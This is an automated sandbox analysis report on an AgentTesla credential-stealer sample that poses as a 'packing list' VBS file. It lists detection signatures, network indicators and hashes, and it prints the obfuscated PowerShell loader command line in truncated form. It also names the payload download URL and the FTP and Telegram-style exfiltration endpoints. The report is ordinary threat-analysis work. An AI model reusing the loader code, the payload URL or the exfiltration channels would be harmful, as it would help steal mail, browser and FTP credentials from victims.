Windows Analysis Report
Packing list ASPL22-23-1504_jpg.vbs

Overview

General Information

Sample Name: Packing list ASPL22-23-1504_jpg.vbs
Analysis ID: 760647
MD5: 4801db168afe0ad575eafdd22e291e24
SHA1: e54956803f75bc667f7242a3dc2b7946c785807b
SHA256: 4641f107daa5b52f5ca15e0db5ce5c4bacacd7714e2f14792217539dde54a580
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: ftp.mcmprint.net Virustotal: Detection: 9% Perma Link
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 3.220.57.224:443 -> 192.168.11.20:49836 version: TLS 1.2

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.11.20:63569 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49837 -> 185.31.121.136:21
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49838 -> 185.31.121.136:54251
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.220.57.224 3.220.57.224
Source: Joe Sandbox View IP Address: 3.220.57.224 3.220.57.224
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fonts/qQdCidiSDbbqpK88.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fumiduer.tkCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49838 -> 185.31.121.136:54251
Uses FTP
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49837 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:41. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:41. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: powershell.exe, 00000003.00000003.5139997151.0000022D9BA3C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.10163076293.000000001F914000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.5805000728.000000001F8D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000003.00000002.5775017451.0000022D9BA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.5728164555.0000022D9BA14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.5721229942.0000022D9BA14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.5139546464.0000022D9B9FA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.10163076293.000000001F914000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.5805000728.000000001F8D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000008.00000002.10121705429.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fumiduer.tk/fonts/qQdCidiSDbbqpK88.deploy
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kmbImL.com
Source: powershell.exe, 00000003.00000002.5736622933.0000022D835F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.10147619892.000000001D858000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.10147700930.000000001D85C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.5803713714.000000001C3E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://zWbgxd4BNxXS54DqD.com
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://zWbgxd4BNxXS54DqD.comXy
Source: powershell.exe, 00000003.00000002.5736622933.0000022D835F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
Source: CasPol.exe, 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: fumiduer.tk
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1D4AA09A recv, 8_2_1D4AA09A
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fonts/qQdCidiSDbbqpK88.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fumiduer.tkCache-Control: no-cache
Source: unknown HTTPS traffic detected: 3.220.57.224:443 -> 192.168.11.20:49836 version: TLS 1.2

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Petling110.ShellExecute Wonderstrong1, " " & chrw(34) + A8 + chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22126
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7211
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 22126 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7211 Jump to behavior
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1F866BE0 8_2_1F866BE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1F864814 8_2_1F864814
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1F86E844 8_2_1F86E844
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1F868B70 8_2_1F868B70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1F866420 8_2_1F866420
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_2025AC70 8_2_2025AC70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_2025C490 8_2_2025C490
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_20254510 8_2_20254510
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_2025DE10 8_2_2025DE10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_20256688 8_2_20256688
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_2025ECD0 8_2_2025ECD0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_20332D03 8_2_20332D03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_20331540 8_2_20331540
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_203348A0 8_2_203348A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_203350D8 8_2_203350D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_203311C2 8_2_203311C2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_202594D0 8_2_202594D0
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1D4AB206 NtQuerySystemInformation, 8_2_1D4AB206
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_1D4AB1D5 NtQuerySystemInformation, 8_2_1D4AB1D5
Java / VBScript file with very long strings (likely obfuscated code)
Source: Packing list ASPL22-23-1504_jpg.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: security.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Packing list ASPL22-23-1504_jpg.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
